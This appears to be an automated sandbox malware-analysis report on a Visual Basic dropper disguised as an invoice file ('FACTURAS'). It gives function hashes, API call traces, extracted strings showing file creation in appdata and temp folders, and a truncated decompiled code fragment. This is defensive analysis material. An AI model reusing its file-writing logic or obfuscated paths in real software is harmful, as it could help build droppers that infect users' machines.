Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n
API String ID: 0-1136336886
Opcode ID: 76aafe24bc4af4a99ff32f7d403f6f29e8cb126fba469600f0ab4d5a4ed9c6cd
Instruction ID: 32f0b67f7eae863c8173089ea180679be76aa9687bbc9ded891a9e5b5c9fcb18
Opcode Fuzzy Hash: 76aafe24bc4af4a99ff32f7d403f6f29e8cb126fba469600f0ab4d5a4ed9c6cd
Instruction Fuzzy Hash: 67C1DB72A05349DFDB65CF79C8483DAB7B2FF61300F15812AEC589B611CBB19AA4DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0306AE9A, Relevance: 1.5, Strings: 1, Instructions: 274COMMON

Download Yara Rule

Strings

-3n, xrefs: 0306B206

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n
API String ID: 0-1136336886
Opcode ID: 8476d514ac70cad9622d54cfd47e776e6b77451c0461eceb420678961fb88048
Instruction ID: 3db5f18af853022c57d87b43aea325bd1197fc014884c0e789b2c4e9aa44e763
Opcode Fuzzy Hash: 8476d514ac70cad9622d54cfd47e776e6b77451c0461eceb420678961fb88048
Instruction Fuzzy Hash: 43C1DC71A05349DBDB74CF3AC8583DAB7B2FF64300F15812AEC589B611CBB59AA4DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0306B034, Relevance: 1.5, Strings: 1, Instructions: 228COMMON

Download Yara Rule

Strings

-3n, xrefs: 0306B206

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n
API String ID: 0-1136336886
Opcode ID: 5f1eebede0b634dc6fd9c228c7232e0c89bd2551e94ef356babb06f3cf237c7e
Instruction ID: 9fdd46add4d5b9a712fac77d4c0a8ec558e05195a1a9364552e6cee45ed56dae
Opcode Fuzzy Hash: 5f1eebede0b634dc6fd9c228c7232e0c89bd2551e94ef356babb06f3cf237c7e
Instruction Fuzzy Hash: A6A1DC71A05349DBDB65CF39C8583DAB7B2FF61300F04822AEC589B551CBB69AA4DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0306E8B4, Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

'}4, xrefs: 0306EB4E

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: '}4
API String ID: 0-2910364189
Opcode ID: 9765c6e77faa2aacfa85f8b8f4b21b8cc018b55f7041e99115324ab9ba608903
Instruction ID: 71ff75467c2ed498017cf03b2a4074dd19af161bd4f03f53d4ed88607b0df65e
Opcode Fuzzy Hash: 9765c6e77faa2aacfa85f8b8f4b21b8cc018b55f7041e99115324ab9ba608903
Instruction Fuzzy Hash: E3610E32A48786DBDB78CF35C9583EAB3B6FF61300F05816EDC149A902DB725664EB40

Uniqueness

Uniqueness Score: -1.00%

Function 0306B1FE, Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

-3n, xrefs: 0306B206

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: -3n
API String ID: 0-1136336886
Opcode ID: f0893e68bbe8f502a6937619aba8ab731f1016f821119d994a6afdb9d5b42092
Instruction ID: 53999e45f993549ba947f029268f092b2344f8e48da97a3609428742bf8f4d78
Opcode Fuzzy Hash: f0893e68bbe8f502a6937619aba8ab731f1016f821119d994a6afdb9d5b42092
Instruction Fuzzy Hash: 976198B5A02288DFDB75CF29CD547CA3BB1BF59350F04812AEC499B264C7B59A80DB80

Uniqueness

Uniqueness Score: -1.00%

Function 03069932, Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

$, xrefs: 03069D0C

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 3adc6d828ec52edb1220d3aeac29664f9bc10425b91a251f7512dac2c52bb3d2
Instruction ID: 59a41d1cb8f3c9eb0c4d9f01f410ef8d585e0f5bc1785a11a10448e3f1e59de5
Opcode Fuzzy Hash: 3adc6d828ec52edb1220d3aeac29664f9bc10425b91a251f7512dac2c52bb3d2
Instruction Fuzzy Hash: 9D51BC75608349DFDBB0EE78CC447EA7BB2FF44340F818519E9899A658D3348985CF46

Uniqueness

Uniqueness Score: -1.00%

Function 03074BBF, Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

=k, xrefs: 03074CDD

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: =k
API String ID: 0-4048675473
Opcode ID: 5f1114acb21daa87c0e355bc53273c080117ca7923b0e7237c8929b752fd9c22
Instruction ID: c9ec40d1a7b07a183794bfaff6866f765abdffa9820e338a156e15ac5a01f309
Opcode Fuzzy Hash: 5f1114acb21daa87c0e355bc53273c080117ca7923b0e7237c8929b752fd9c22
Instruction Fuzzy Hash: 0C21C675B0534A8BCB30DF55D4C47EEB3A2BF9A700F88C459DC598B216E2704546C609

Uniqueness

Uniqueness Score: -1.00%

Function 0306D566, Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

QY, xrefs: 0306D6A4

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: QY
API String ID: 0-3367714105
Opcode ID: db87bb9d6fea228859504d4ba089ff543dbcce4f4332e7bb3bc1a5867909e823
Instruction ID: 7768e35ce4545cbdda7eeccbfc29f2e7d48789c27adf6feb2158498a68268c48
Opcode Fuzzy Hash: db87bb9d6fea228859504d4ba089ff543dbcce4f4332e7bb3bc1a5867909e823
Instruction Fuzzy Hash: C911E236809364DBC7289E70CE16AEEBBA4BF15350F570A4DDCDA67520D3700E80DB82

Uniqueness

Uniqueness Score: -1.00%

Function 0307339D, Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

<a>, xrefs: 030734A9

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID: <a>
API String ID: 0-1575895737
Opcode ID: 742ce747826cc3cc42466fc3857c7d2c95d795dcca5439dd52e1abc59391bd9a
Instruction ID: fe599973b9810b5f0e534afe61dd32a9ea7be2209cb603fc84c8b18bbde1a060
Opcode Fuzzy Hash: 742ce747826cc3cc42466fc3857c7d2c95d795dcca5439dd52e1abc59391bd9a
Instruction Fuzzy Hash: 701139B4609389CFDB75CF18C880BDEB3B5AF54350F4545A9E8098F260D730DA40DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 030692AF, Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ffd84001dd24fd07198d94f7e99bb7c96d22dc328b9594b527c10d9ca8f2ff6
Instruction ID: 3f7114c0a6f5b227dec514d48a2ef35aaad100bf5cdfb0decf5839c63acaedbe
Opcode Fuzzy Hash: 4ffd84001dd24fd07198d94f7e99bb7c96d22dc328b9594b527c10d9ca8f2ff6
Instruction Fuzzy Hash: 4971E675A46349DFDB70CE2989947DA77E1BF58340F68492ACD4E8BA08C3309A41CB15

Uniqueness

Uniqueness Score: -1.00%

Function 030692DA, Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00792c0c433a3eb333f6d673fb11986491cc2877fbdf8af31462f9d7ba94659e
Instruction ID: 79416dc955e665f1a32f17253ab17b34b65f537518eb39e8fce61c52793bd0dc
Opcode Fuzzy Hash: 00792c0c433a3eb333f6d673fb11986491cc2877fbdf8af31462f9d7ba94659e
Instruction Fuzzy Hash: AF61EC31649706DFD774CF26C8983AAF3F2FFA4300F64822ED8588A905CB71A665DB04

Uniqueness

Uniqueness Score: -1.00%

Function 03073994, Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0c22178ee689d6fe9f675c4395c21df706f3dc0259397de3da8f12bc5d0238
Instruction ID: 53592c1b168c295c32f192abe49e99f0cc97453ec80671c20897ae549205159f
Opcode Fuzzy Hash: 0f0c22178ee689d6fe9f675c4395c21df706f3dc0259397de3da8f12bc5d0238
Instruction Fuzzy Hash: F0713431608742DBE764CF36C8983EAF3B2FFA0310F29824ED8549A942DB316274DB05

Uniqueness

Uniqueness Score: -1.00%

Function 03073D0C, Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b46d56abdbd951eb7c93b375f366255baa9a5b33c1db3ea1fc2f32cb3a96ce1a
Instruction ID: 5c1c6a20c04c93e1d8bfeb6c95c49fa09fc54ffc657c22e801f423fc14c3312e
Opcode Fuzzy Hash: b46d56abdbd951eb7c93b375f366255baa9a5b33c1db3ea1fc2f32cb3a96ce1a
Instruction Fuzzy Hash: B6612331A08B45DBE774CF36D8883AAF3B6FFA0310F65824ED8549A941DB71A274DB05

Uniqueness

Uniqueness Score: -1.00%

Function 03073BCC, Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95bbc56912f23d3e92b0574f555938fbe773da5026f644aa26e8eccc9ff0943e
Instruction ID: be34b8ab89d0c8e09e0411ecceb8f3d12dc09798459346d1e1b7442f6f106ab1
Opcode Fuzzy Hash: 95bbc56912f23d3e92b0574f555938fbe773da5026f644aa26e8eccc9ff0943e
Instruction Fuzzy Hash: B8612331A09B45DBE774CF26C8983EAF3B2FFA1300F65424ED8549A941DB31A274DB05

Uniqueness

Uniqueness Score: -1.00%

Function 03073860, Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2eea51fe368fd21006e22d5f470da80f82a8574ac97bbb9271003e97f1caac1
Instruction ID: edee9a97c0740cdacc186ec029016b3795256ccd90a3b927f2e07168602d7478
Opcode Fuzzy Hash: b2eea51fe368fd21006e22d5f470da80f82a8574ac97bbb9271003e97f1caac1
Instruction Fuzzy Hash: B4613432A09741DBE774CF26D8883DAF3B2FFA0300F25424ED8489B941DB31A664DB45

Uniqueness

Uniqueness Score: -1.00%

Function 03073ABC, Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 035ec39aa68ff776beb824e63f56e3bb0ef165c08dd5c102c47c2960e21a09e5
Instruction ID: ed89373e580821ef1dc9e9950593d552e9d3b161cd904c2ae862c05ac3bdd10f
Opcode Fuzzy Hash: 035ec39aa68ff776beb824e63f56e3bb0ef165c08dd5c102c47c2960e21a09e5
Instruction Fuzzy Hash: 1F612331A08A45DBE774CF26D8883EAF3B2FFA0300F25424ED8589A941DB31A274DB05

Uniqueness

Uniqueness Score: -1.00%

Function 03069444, Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1359ad059afff316d1cfd33a0d3889e8ea22d9891320cdbdcb1b9d2cca0bab5
Instruction ID: d20e819e2476d978c727d8e3e24ea57df1aee0eb9864819c736aed34325506f4
Opcode Fuzzy Hash: d1359ad059afff316d1cfd33a0d3889e8ea22d9891320cdbdcb1b9d2cca0bab5
Instruction Fuzzy Hash: 8751F031609702DBD7A4CF76C8983A6F3B2FFA4700B64826FD8585AC06DB759275DB04

Uniqueness

Uniqueness Score: -1.00%

Function 0306957A, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71860a4e70fc57bf3e02df95476b5ff571396933bb9c5b249e6f583c5fc654c3
Instruction ID: 212e03683fb5880eec1ae43012361031a96a2190d0e6e58f1bf1a31ee55ca553
Opcode Fuzzy Hash: 71860a4e70fc57bf3e02df95476b5ff571396933bb9c5b249e6f583c5fc654c3
Instruction Fuzzy Hash: 43419C31648B02DBD368CF76D498366F3B2FFA5300B64829ED8545AC02DF765174D704

Uniqueness

Uniqueness Score: -1.00%

Function 03074430, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a592ea45480c766d289449366370c3c999b3fe12b0a857a2143a4e9515d213cf
Instruction ID: 5462cdb5e06479eeb41b98f0a67c7df24b7eb7f833d8a62241ff55fb134e8e87
Opcode Fuzzy Hash: a592ea45480c766d289449366370c3c999b3fe12b0a857a2143a4e9515d213cf
Instruction Fuzzy Hash: 441157766003548FCB749E398CD6BEB7BA6EF09340F52011ECD4B9B255C7314242DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0306D11F, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 03072A70, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 004025A7, Relevance: 140.3, APIs: 68, Strings: 12, Instructions: 348
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(00000000,00401396), ref: 004206F3
__vbaStrCopy.MSVBVM60(?,00000000,?,00000000,00401396), ref: 0042070B
#583.MSVBVM60(?,?,?,00000000,?,00000000,00401396), ref: 0042071B
__vbaFpR8.MSVBVM60(?,?,?,00000000,?,00000000,00401396), ref: 00420720
#539.MSVBVM60(000000C8,000000C8,0000002E,00000013,?,?,?,00000000,?,00000000,00401396), ref: 00420741
#522.MSVBVM60(?,000000C8,000000C8,000000C8,0000002E,00000013,?,?,?,00000000,?,00000000,00401396), ref: 0042074E
__vbaStrVarMove.MSVBVM60(?,?,000000C8,000000C8,000000C8,0000002E,00000013,?,?,?,00000000,?,00000000,00401396), ref: 00420757
__vbaStrMove.MSVBVM60(?,?,000000C8,000000C8,000000C8,0000002E,00000013,?,?,?,00000000,?,00000000,00401396), ref: 00420761
__vbaStrCopy.MSVBVM60(?,?,000000C8,000000C8,000000C8,0000002E,00000013,?,?,?,00000000,?,00000000,00401396), ref: 00420771
__vbaFreeStr.MSVBVM60(?,?,000000C8,000000C8,000000C8,0000002E,00000013,?,?,?,00000000,?,00000000,00401396), ref: 00420779
__vbaFreeVarList.MSVBVM60(00000002,000000C8,?,?,?,000000C8,000000C8,000000C8,0000002E,00000013,?,?,?,00000000,?,00000000), ref: 00420788
__vbaVarDup.MSVBVM60 ref: 004207A4
#666.MSVBVM60(?,?), ref: 004207B1
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,?,?), ref: 004207D6
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,?,?), ref: 004207DC
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,?,?), ref: 004207E6
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,?), ref: 004207F5
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,?), ref: 004207FD
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,?), ref: 00420810
__vbaGet3.MSVBVM60(00000000,?,00000001), ref: 00420825
__vbaFileClose.MSVBVM60(00000001,00000000,?,00000001), ref: 0042082C
#618.MSVBVM60(Velseslokaler2,00000015,00000001,00000000,?,00000001), ref: 00420838
__vbaStrMove.MSVBVM60(Velseslokaler2,00000015,00000001,00000000,?,00000001), ref: 00420842
#617.MSVBVM60(?,00000008,000000F6), ref: 00420871
__vbaStrVarMove.MSVBVM60(?,?,00000008,000000F6), ref: 0042087A
__vbaStrMove.MSVBVM60(?,?,00000008,000000F6), ref: 00420884
__vbaFreeStr.MSVBVM60(?,?,00000008,000000F6), ref: 0042088C
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000F6), ref: 0042089B
__vbaStrCopy.MSVBVM60(?,?,?,00000000,?,00000000,00401396), ref: 004208CE
#515.MSVBVM60(?,00004008,00000037), ref: 004208EF
__vbaVarTstEq.MSVBVM60(?,?,?,00004008,00000037), ref: 00420910
__vbaFreeVar.MSVBVM60(?,?,?,00004008,00000037), ref: 0042091F
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 0042093E
__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 00420947
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 00420951
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 00420959
__vbaVarDup.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 00420972
#666.MSVBVM60(?,?,?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 0042097F
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 004209B5
__vbaChkstk.MSVBVM60(?,00000008,?,?,?,?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 004209BF
__vbaChkstk.MSVBVM60(?,00000008,?,?,?,?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,00004008,00000037), ref: 004209CD
__vbaLateMemCallLd.MSVBVM60(?,?,CreateTextFile,00000002,?,00000008,?,?,?,?,00000000,?,?,Scripting.FileSystemObject,00000000,?), ref: 004209EC
__vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,00000000,?,00000000,00401396), ref: 004209F5
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,?,?,?,?,00000000,?,00000000,00401396), ref: 00420A04
__vbaFreeVarList.MSVBVM60(00000004,00000000,?,?,?,?,00000000,00000000,?,?,?,?,?,00000000,?,00000000), ref: 00420A1B
__vbaVarDup.MSVBVM60 ref: 00420A37
#518.MSVBVM60(?,00000000), ref: 00420A44
__vbaStrVarMove.MSVBVM60(?,?,00000000), ref: 00420A4D
__vbaStrMove.MSVBVM60(?,?,00000000), ref: 00420A57
__vbaFreeVarList.MSVBVM60(00000002,00000000,?,?,?,00000000), ref: 00420A66
__vbaStrCat.MSVBVM60(Skifflegrupperne,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 00420A7C
__vbaStrMove.MSVBVM60(Skifflegrupperne,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 00420A86
__vbaStrCopy.MSVBVM60(Skifflegrupperne,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 00420A96
__vbaFreeStr.MSVBVM60(Skifflegrupperne,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 00420A9E
__vbaVarDup.MSVBVM60(Skifflegrupperne,?), ref: 00420AB7
#666.MSVBVM60(?,00000000), ref: 00420AC4
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,?,00000000), ref: 00420AE9
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,?,00000000), ref: 00420AEF
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,?,00000000), ref: 00420AF9
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,00000000), ref: 00420B08
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,00000000), ref: 00420B10
__vbaFreeVarList.MSVBVM60(00000003,00000000,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,00000000), ref: 00420B23
__vbaGet3.MSVBVM60(00000000,?,00000001,?,?,Skifflegrupperne,?,?,?,?,?,?,?,00000000,00000000), ref: 00420B38
__vbaFileClose.MSVBVM60(00000001,00000000,?,00000001,?,?,Skifflegrupperne,?,?,?,?,?,?,?,00000000,00000000), ref: 00420B3F
__vbaFreeStr.MSVBVM60(00420B90,?,?,?,00004008,00000037), ref: 00420B72
__vbaFreeStr.MSVBVM60(00420B90,?,?,?,00004008,00000037), ref: 00420B7A
__vbaFreeStr.MSVBVM60(00420B90,?,?,?,00004008,00000037), ref: 00420B82
__vbaFreeObj.MSVBVM60(00420B90,?,?,?,00004008,00000037), ref: 00420B8A
__vbaErrorOverflow.MSVBVM60(00000000), ref: 00420BA3
__vbaChkstk.MSVBVM60(00000000,00401396,?,?,?,00000000), ref: 00420BC3
__vbaObjSetAddref.MSVBVM60(00000000,?,?,00000000,?,00000000,00401396), ref: 00420BDC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402958,00000058), ref: 00420C08
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00420C23
#644.MSVBVM60(?,?,?), ref: 00420C2C
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 00420C3D
__vbaChkstk.MSVBVM60(00000000,?,?,00000000,?,?,?), ref: 00420C82
__vbaChkstk.MSVBVM60(00000000,?,?,00000000,?,?,?), ref: 00420C93
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402958,000002B0), ref: 00420CCA

Strings

Velseslokaler2, xrefs: 00420833
CreateTextFile, xrefs: 004209E0
\Ffbziag21THawVfLdzos3x101, xrefs: 00420984
\uLeVLTlngarzDsxDxFry75Ru4, xrefs: 00420AC9
\Bh2BSU9xxO49MYboEPptixGKslvKjoQApxmsXHE151, xrefs: 004207B6
Umload4, xrefs: 00420A23
Scripting.FileSystemObject, xrefs: 00420935
appdata, xrefs: 00420790, 00420AA3
Wrothily, xrefs: 004208C0
INCOGNITE, xrefs: 004208F4
Skifflegrupperne, xrefs: 00420A77
TMP, xrefs: 0042095E

Memory Dump Source

Source File: 00000000.00000002.860876690.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.860868648.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.860924190.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Free$Move$ChkstkList$AddrefCopyFile$#666$CheckCloseGet3HresultOpen$#515#518#522#539#583#617#618#644#716CallErrorLateOverflow
String ID: CreateTextFile$INCOGNITE$Scripting.FileSystemObject$Skifflegrupperne$TMP$Umload4$Velseslokaler2$Wrothily$\Bh2BSU9xxO49MYboEPptixGKslvKjoQApxmsXHE151$\Ffbziag21THawVfLdzos3x101$\uLeVLTlngarzDsxDxFry75Ru4$appdata
API String ID: 1779615046-1518413975
Opcode ID: 9d1e0a08e5482c7ca490eed888a6b294d425b6580b1abfdadb9551e8663a33e4
Instruction ID: d7e615faf12afc61e80ff9e12dc828bb634d5045919a83b4002146fdaeba8755
Opcode Fuzzy Hash: 9d1e0a08e5482c7ca490eed888a6b294d425b6580b1abfdadb9551e8663a33e4
Instruction Fuzzy Hash: 90D12171900108ABDB01EBE1CD46FDEB7BCAF14308F50457AB505BB1E2DB79AB098B58

Uniqueness

Uniqueness Score: -1.00%

Function 00402566, Relevance: 100.1, APIs: 53, Strings: 4, Instructions: 310
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00402566(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, void* _a12, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				short _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v76;
				char _v84;
				intOrPtr _v92;
				char _v100;
				char _v116;
				char* _v140;
				intOrPtr _v148;
				char* _v172;
				char _v180;
				void* _v184;
				void* _v188;
				signed int _v192;
				intOrPtr* _v196;
				signed int _v200;
				intOrPtr _v212;
				signed int _v216;
				intOrPtr* _v220;
				signed int _v224;
				signed int _v228;
				intOrPtr* _v232;
				signed int _v236;
				signed int _v240;
				short _t161;
				char* _t165;
				signed int _t172;
				signed int _t177;
				signed int _t188;
				signed int _t193;
				signed int _t201;
				void* _t260;
				void* _t262;
				intOrPtr _t263;

				_a4 = _a4 - 0xffff;
				_t263 = _t262 - 0xc;
				 *[fs:0x0] = _t263;
				L00401390();
				_v16 = _t263;
				_v12 = 0x4012c8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401396, _t260);
				L00401642();
				L00401642();
				L0040148C();
				asm("fcomp qword [0x4012b8]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					if( *0x4223f0 != 0) {
						_v220 = 0x4223f0;
					} else {
